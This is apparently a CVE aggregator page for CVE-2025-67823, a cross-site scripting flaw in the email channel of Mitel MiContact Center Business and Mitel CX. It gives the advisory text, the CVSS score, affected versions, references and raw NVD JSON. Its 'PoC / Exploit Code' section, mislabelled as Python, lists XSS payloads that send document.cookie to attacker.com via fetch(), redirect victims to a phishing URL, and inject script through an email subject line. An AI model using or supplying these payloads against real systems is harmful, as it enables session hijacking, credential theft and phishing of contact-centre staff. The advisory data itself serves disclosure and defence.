CVE-2025-67823

Description

A vulnerability in the Multimedia Email component of Mitel MiContact Center Business through 10.2.0.10 and Mitel CX through 1.1.0.1 could allow an unauthenticated attacker to conduct a Cross-Site Scripting (XSS) attack due to insufficient input validation. A successful exploit requires user interaction where the email channel is enabled. This could allow an attacker to execute arbitrary scripts in the victim's browser or desktop client application.

CVSS Details

CVSS Score

8.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:mitel:cx:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:mitel:micontact_center_business:*:*:*:*:*:*:*:* - VULNERABLE

Mitel MiContact Center Business < 10.2.0.11

Mitel MiContact Center Business <= 10.2.0.10

Mitel CX < 1.1.0.2

Mitel CX <= 1.1.0.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-67823 XSS PoC - Mitel MiContact Center Business -->
<!-- Send malicious email to trigger XSS when viewed -->

<!-- Basic XSS Payload -->
<script>alert(document.cookie)</script>

<!-- Event Handler XSS Payload -->
<img src=x onerror="fetch('https://attacker.com/steal?c='+document.cookie)">

<!-- SVG-based XSS Payload -->
<svg/onload=fetch('https://attacker.com/cookie='+btoa(document.cookie))>

<!-- Phishing Redirect Payload -->
<script>window.location.href='https://attacker.com/phishing?redirect='+window.location.href</script>

<!-- Session Hijacking Payload -->
<script>
var cookies = document.cookie;
fetch('https://attacker.com/api/log?data=' + encodeURIComponent(cookies));
</script>

<!-- Email Subject Field Injection -->
Subject: Important Update <img src=x onerror=alert('XSS')>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-67823
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-67823
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-67823/
[4] VulDB https://vuldb.com/cve/CVE-2025-67823
[5] https://www.mitel.com/support/security-advisories
[6] https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-misa-2025-0010

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-67823", "sourceIdentifier": "[email protected]", "published": "2026-01-15T22:16:11.117", "lastModified": "2026-01-23T19:38:47.383", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the Multimedia Email component of Mitel MiContact Center Business through 10.2.0.10 and Mitel CX through 1.1.0.1 could allow an unauthenticated attacker to conduct a Cross-Site Scripting (XSS) attack due to insufficient input validation. A successful exploit requires user interaction where the email channel is enabled. This could allow an attacker to execute arbitrary scripts in the victim's browser or desktop client application."}, {"lang": "es", "value": "Una vulnerabilidad en el componente de Correo Electrónico Multimedia de Mitel MiContact Center Business hasta la versión 10.2.0.10 y Mitel CX hasta la versión 1.1.0.1 podría permitir a un atacante no autenticado realizar un ataque de Cross-Site Scripting (XSS) debido a una validación de entrada insuficiente. Un exploit exitoso requiere interacción del usuario donde el canal de correo electrónico está habilitado. Esto podría permitir a un atacante ejecutar scripts arbitrarios en el navegador de la víctima o en la aplicación de cliente de escritorio."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mitel:cx:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.0", "matchCriteriaId": "44861513-C99B-4840-86A0-FF1CC107DB32"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mitel:micontact_center_business:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.2.0.11", "matchCriteriaId": "F2ACED18-C47B-4220-A3CD-01454BE1E551"}]}]}], "references": [{"url": "https://www.mitel.com/support/security-advisories", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-misa-2025-0010", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}